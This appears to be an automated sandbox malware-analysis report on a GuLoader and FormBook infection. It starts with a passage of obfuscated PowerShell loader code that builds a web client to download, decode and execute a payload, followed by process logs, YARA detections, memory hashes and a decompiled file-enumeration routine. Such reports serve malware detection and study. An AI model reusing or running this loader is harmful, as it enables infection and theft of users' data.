Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                              Imagebase:0xaf0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000018.00000002.2970578601.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000018.00000002.2944964095.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.2970941150.000000000A1F7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:25
                              Start time:02:09:50
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:02:10:06
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x7ff6ae840000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:02:10:07
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000002.3098293676.0000000003B17000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:28
                              Start time:02:10:28
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe"
                              Imagebase:0xc60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Has exited:false

                              Target ID:29
                              Start time:02:10:30
                              Start date:31/05/2024
                              Path:C:\Windows\SysWOW64\clip.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                              Imagebase:0xce0000
                              File size:24'576 bytes
                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Has exited:false

                              Target ID:30
                              Start time:02:10:43
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe"
                              Imagebase:0xc60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Has exited:false

                              Target ID:31
                              Start time:02:10:46
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:02:10:47
                              Start date:31/05/2024
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Imagebase:0x7ff6c2750000
                              File size:71'680 bytes
                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:02:10:55
                              Start date:31/05/2024
                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                              Imagebase:0x760000
                              File size:516'608 bytes
                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:02:10:56
                              Start date:31/05/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff728280000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:false

                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34690000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a3f3d7a662fa18e03e3cbe730640741efdb1a50e58f724e2db4bbf4ae476d71
                                • Instruction ID: 082c87fd3c25967a8564f2cad38147fdcd3279f35d70bfd89a5c2efeadfa9c11
                                • Opcode Fuzzy Hash: 9a3f3d7a662fa18e03e3cbe730640741efdb1a50e58f724e2db4bbf4ae476d71
                                • Instruction Fuzzy Hash: D0F19530A18A8D8FEBA8DF28CC957E937E1FF55310F04426EE84DC7291DB7899459B81
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34690000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 961fd74c1f79261587570d4c5d8e35189cd0bae16df9107c4f4787e9941bbacb
                                • Instruction ID: 55fbfca6d487a7b3c1111bc122330748d80d4b5a83ce56a50f8d40a73b7eda3c
                                • Opcode Fuzzy Hash: 961fd74c1f79261587570d4c5d8e35189cd0bae16df9107c4f4787e9941bbacb
                                • Instruction Fuzzy Hash: 68E1B430A08A4E8FEBA8DF28D8A57E977D1FF55710F04426ED84DC7291DF78A8458B81
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86e898218372bc26ff38c15e5c9b44f3e65b860d9dfeb9befd1f68e22e4d6e1a
                                • Instruction ID: ada702b472753155d36901dc99ab6dbe465545c4671e048a289db15b3095d4a3
                                • Opcode Fuzzy Hash: 86e898218372bc26ff38c15e5c9b44f3e65b860d9dfeb9befd1f68e22e4d6e1a
                                • Instruction Fuzzy Hash: 3CE14A72B0DA8A8FE795DB2848B51B87BE2EF56324B1801BED54DC71D3CA1CB805D381
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d4e8bf93f67aa710fdc78ba49203cadfcd1b03fddabfc9e7b74125337a494eaf
                                • Instruction ID: 378cd7e1feae652f9acf66857b443cfb87d34085b7b9bc40ab2422c77c5384c9
                                • Opcode Fuzzy Hash: d4e8bf93f67aa710fdc78ba49203cadfcd1b03fddabfc9e7b74125337a494eaf
                                • Instruction Fuzzy Hash: B1B11572A0DA8C5FE7A5EA6C98A55A53BE2EF57320B1401BBD14DC7193DA18FC06C381
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f58f1a1331a0c3f3adcd97d439a968b740c5f998035ca6931680652266ccc8cc
                                • Instruction ID: 55d9371f15f2eaac2acb3fd919cb8bb1f5ebfd43e9f50c30f6a5c6af11d5e5c4
                                • Opcode Fuzzy Hash: f58f1a1331a0c3f3adcd97d439a968b740c5f998035ca6931680652266ccc8cc
                                • Instruction Fuzzy Hash: 23A17972B0DA894FEBE4DA2C64A81B87BD3EF56360B4401BED50DC7293DD1CAC019380
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34690000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee6527bd196ddfad7ebce2729ed989711fb33a852ebebe1a74e10a3b48e6aa7e
                                • Instruction ID: 493344fff5483a1025a4dfa5acf01406b2b771cdbbcfebf559b9be0add9e4eaf
                                • Opcode Fuzzy Hash: ee6527bd196ddfad7ebce2729ed989711fb33a852ebebe1a74e10a3b48e6aa7e
                                • Instruction Fuzzy Hash: C081003160C6854FE759EF18C4E16E5BBE1FF96314B1401BED0CAC71A3DA69A846CB41
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0f94fd425fc757af4b6671c9b3ff1b262eefe55357348fea43e0584a772cd3af
                                • Instruction ID: 13c80ac357e4d7632d586a7cdd8c30233c23591edb71b58f11b56c468dae5428
                                • Opcode Fuzzy Hash: 0f94fd425fc757af4b6671c9b3ff1b262eefe55357348fea43e0584a772cd3af
                                • Instruction Fuzzy Hash: 144134A2B0EA8A4FE795DB2C48B51B87BD2EF52264B5801BAD10DD72D3DD1CFC049381
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f716e06fe7bef64195e1cf7be8577b5001bd9e1abb091eb52f068d096b9bf5d7
                                • Instruction ID: 6a436620f817d3420d7321bfc1968bb3e7ef147843fe4dceb9aac97edbfa4976
                                • Opcode Fuzzy Hash: f716e06fe7bef64195e1cf7be8577b5001bd9e1abb091eb52f068d096b9bf5d7
                                • Instruction Fuzzy Hash: 8C313993F1EA964BE7E5966828B51787AC3EF022B0B5801FAD54DD72D3ED0CA8046381
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692795610.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffd34760000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 61c37cbb3ba571e33a5c2917fb779c2b7450398d4bc027ce8771a94fad046681
                                • Instruction ID: 957830c80129f5dc9b11b72d6e6c031e75191b83400d8f26a21cf94d774f6559
                                • Opcode Fuzzy Hash: 61c37cbb3ba571e33a5c2917fb779c2b7450398d4bc027ce8771a94fad046681
                                • Instruction Fuzzy Hash: DB21F472B0DAD98FEB95DA5C84E466837D2EF5632070801BAD24DC7193CB1CFC049781
                                Memory Dump Source
                                • Source File: 00000003.00000002.2692047803.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Opcode ID: 779ed0be9c66e373c61cfe7f71939526de40e332ac5977b4a6ef132e941e4044
                                • Instruction ID: 430bb9fed03f568b40736acaff983ad8820b8bbdd0e8ee3cd71c04db1599668f
                                • Opcode Fuzzy Hash: 779ed0be9c66e373c61cfe7f71939526de40e332ac5977b4a6ef132e941e4044
                                • Instruction Fuzzy Hash: BEE039B4609241DFE712CA20C854A52BB71BB82205F1DC19AD419AF1A3C626AC43CB12
                                Memory Dump Source
                                • Source File: 00000006.00000002.2502782368.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_4660000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e383898840b561e49f8d1774ab6539986458a4cf63fce15b301731f1380dda8e
                                • Instruction ID: df20e9ce5c27276fe0ddab4c58a11ebaa5291c4b03c0b8c5bfe2bb9f91b27b59
                                • Opcode Fuzzy Hash: e383898840b561e49f8d1774ab6539986458a4cf63fce15b301731f1380dda8e
                                • Instruction Fuzzy Hash: 12F08C70A0020ACBEB14DBA4C555B6E7BB2EB80304F104828D202AF398DA78AD488B90
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2502782368.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_4660000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: +TJ_$+TJ_$\V9k$\V9k
                                • API String ID: 0-2415809441
                                • Opcode ID: 64e0a2103a0293727f873c78e097a416620661464694f7e45b48a011c9fcc66b
                                • Instruction ID: ae04d2c48462e542dbd0600ff74bde931d4a98fb6a6b9ac5c16741d216682382
                                • Opcode Fuzzy Hash: 64e0a2103a0293727f873c78e097a416620661464694f7e45b48a011c9fcc66b
                                • Instruction Fuzzy Hash: 37716B70E00249DFDB14CFA9E88179EFBF2AF88754F148129E516A7354EB74A842CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2502782368.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_4660000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: +TJ_$+TJ_$\V9k$\V9k
                                • API String ID: 0-2415809441
                                • Opcode ID: 458d657522ab225d9e138bcf651cd7d7f7199e4b535db7a3c724e0de1868d167
                                • Instruction ID: cd839cfadda7fbda34b82bcdb24a688d71e936275297a4b3ef663b5c552c5f90
                                • Opcode Fuzzy Hash: 458d657522ab225d9e138bcf651cd7d7f7199e4b535db7a3c724e0de1868d167
                                • Instruction Fuzzy Hash: 94714A70E00209DFDB14CFA9D89179EFBF2AF88714F148129E516A7354EB75A842CF91

                                Execution Graph

                                Execution Coverage:2.3%
                                Dynamic/Decrypted Code Coverage:98.2%
                                Signature Coverage:7.3%
                                Total number of Nodes:219
                                Total number of Limit Nodes:5
                                execution_graph 6871 21cb1c5b 6872 21cb1c6b ___scrt_fastfail 6871->6872 6875 21cb12ee 6872->6875 6874 21cb1c87 6876 21cb1324 ___scrt_fastfail 6875->6876 6877 21cb13b7 GetEnvironmentVariableW 6876->6877 6901 21cb10f1 6877->6901 6880 21cb10f1 57 API calls 6881 21cb1465 6880->6881 6882 21cb10f1 57 API calls 6881->6882 6883 21cb1479 6882->6883 6884 21cb10f1 57 API calls 6883->6884 6885 21cb148d 6884->6885 6886 21cb10f1 57 API calls 6885->6886 6887 21cb14a1 6886->6887 6888 21cb10f1 57 API calls 6887->6888 6889 21cb14b5 lstrlenW 6888->6889 6890 21cb14d9 lstrlenW 6889->6890 6891 21cb14d2 6889->6891 6892 21cb10f1 57 API calls 6890->6892 6891->6874 6893 21cb1501 lstrlenW lstrcatW 6892->6893 6894 21cb10f1 57 API calls 6893->6894 6895 21cb1539 lstrlenW lstrcatW 6894->6895 6896 21cb10f1 57 API calls 6895->6896 6897 21cb156b lstrlenW lstrcatW 6896->6897 6898 21cb10f1 57 API calls 6897->6898 6899 21cb159d lstrlenW lstrcatW 6898->6899 6900 21cb10f1 57 API calls 6899->6900 6900->6891 6902 21cb1118 ___scrt_fastfail 6901->6902 6903 21cb1129 lstrlenW 6902->6903 6914 21cb2c40 6903->6914 6905 21cb1148 lstrcatW lstrlenW 6906 21cb1168 lstrlenW 6905->6906 6907 21cb1177 lstrlenW FindFirstFileW 6905->6907 6906->6907 6908 21cb11e1 6907->6908 6909 21cb11a0 6907->6909 6908->6880 6910 21cb11aa 6909->6910 6911 21cb11c7 FindNextFileW 6909->6911 6910->6911 6916 21cb1000 6910->6916 6911->6909 6913 21cb11da FindClose 6911->6913 6913->6908 6915 21cb2c57 6914->6915 6915->6905 6915->6915 6917 21cb1022 ___scrt_fastfail 6916->6917 6918 21cb10af 6917->6918 6919 21cb102f lstrcatW lstrlenW 6917->6919 6922 21cb10b5 lstrlenW 6918->6922 6932 21cb10ad 6918->6932 6920 21cb106b lstrlenW 6919->6920 6921 21cb105a lstrlenW 6919->6921 6933 21cb1e89 lstrlenW 6920->6933 6921->6920 6947 21cb1e16 6922->6947 6925 21cb10ca 6928 21cb1e89 5 API calls 6925->6928 6925->6932 6926 21cb1088 GetFileAttributesW 6927 21cb109c 6926->6927 6926->6932 6927->6932 6939 21cb173a 6927->6939 6929 21cb10df 
